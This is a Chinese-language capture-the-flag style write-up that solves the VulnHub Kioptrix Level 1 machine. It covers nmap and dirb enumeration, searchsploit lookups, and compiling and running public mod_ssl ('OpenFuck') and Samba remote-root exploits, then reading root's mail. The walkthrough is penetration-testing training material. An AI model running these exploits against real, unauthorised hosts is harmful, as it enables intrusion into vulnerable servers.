VulnHub Kioptix Level 1

  • by
Name: Kioptrix: Level 1 (#1) 
Date release: 17 Feb 2010
Link: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

虚拟机开启后先用nmap确定IP,得到192.168.190.129

nmap 192.168.190.0/24 -sP

信息收集

开启服务

# nmap 192.168.190.129 -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-09 13:36 HKT
Nmap scan report for 192.168.190.129
Host is up (0.0037s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:CA:48:7E (VMware)

Web目录

# dirb http://192.168.190.129/
---- Scanning URL: http://192.168.190.129/ ----
+ http://192.168.190.129/~operator (CODE:403|SIZE:273)
+ http://192.168.190.129/~root (CODE:403|SIZE:269)
+ http://192.168.190.129/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.190.129/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.190.129/manual/
==> DIRECTORY: http://192.168.190.129/mrtg/
==> DIRECTORY: http://192.168.190.129/usage/

manual是Apache mod_ssl组件的说明文档

mrtg是一个叫做Multi Router Traffic Grapher的程序,谷歌后发现有cgi脚本的文件读取漏洞,但是… 所有的cgi文件都是404

usage是一个叫做Webalizer的程序,除了泄露了poweredby.png和test.php以外,没有重要的信息。

搜索漏洞

回顾nmap的结果,服务器还开启了22、111、139、1024端口

使用searchsploit搜索对应服务,找到能够直接利用的脚本

# searchsploit mod_ssl 2.8
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)    |    exploits/unix/remote/47080.c

还差一个139端口,已知是Samba服务,但不知道端口,用smbclient和smbinfo获取失败后,用msf成功获取版本号 Samba 2.2.1a

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.190.129
rhosts => 192.168.190.129
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.190.129:139   - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.190.129:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

继续searchsploit搜索Samba,得到可利用的脚本

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution    |    exploits/multiple/remote/10.c

漏洞利用

既然知道了版本号和对应的利用脚本,那么直接用脚本就可以开始攻击了

编译脚本

两个都是.c的源代码,开始编译脚本

# cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./
# cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./
/*一般脚本中都会说明如何编译和使用,以47080.c为例,就需要安装libssl-dev*/
/*编译mod_ssl利用脚本*/
# apt update && apt install libssl-dev
# gcc -o OpenFuck 47080.c -lcrypto
/*编译Samba利用脚本*/
# gcc 10.c -o sambal

那么现在已经有两个脚本已经准备就绪了,分别是mod_ssl的OpenFuck,和Samba的sambal

攻击mod_ssl

# ./OpenFuck -h
Usage: ./OpenFuck target box [port] [-c N]
  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
/*根据nmap的扫描结果,已知目标系统为RedHat,Apache版本为1.3.20,那么OpenFuck的target有两个可以选择,分别是
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
*/

尝试后发现0x6b才可以利用成功

Flag提示EMail,查看/var目录下发现mail目录,读取/var/mail/root获取email

# ls /var
arpwatch
cache
db
ftp
lib
local
lock
log
lost+found
mail
nis
opt
preserve
run
spool
tmp
tux
www
yp
# ls /var/mail
harold
john
nfsnobody
root
# cat /var/mail/root

攻击Samba

root@kali:~# ./sambal
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./sambal [-bBcCdfprsStv] [host]
-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode

总结

入门级的主机,网上还有用enum4linux直接登录的,但是我这里的机器不允许登录不知道为什么。

总算踏上OSCP的学习之路了。

发表评论

电子邮件地址不会被公开。 必填项已用*标注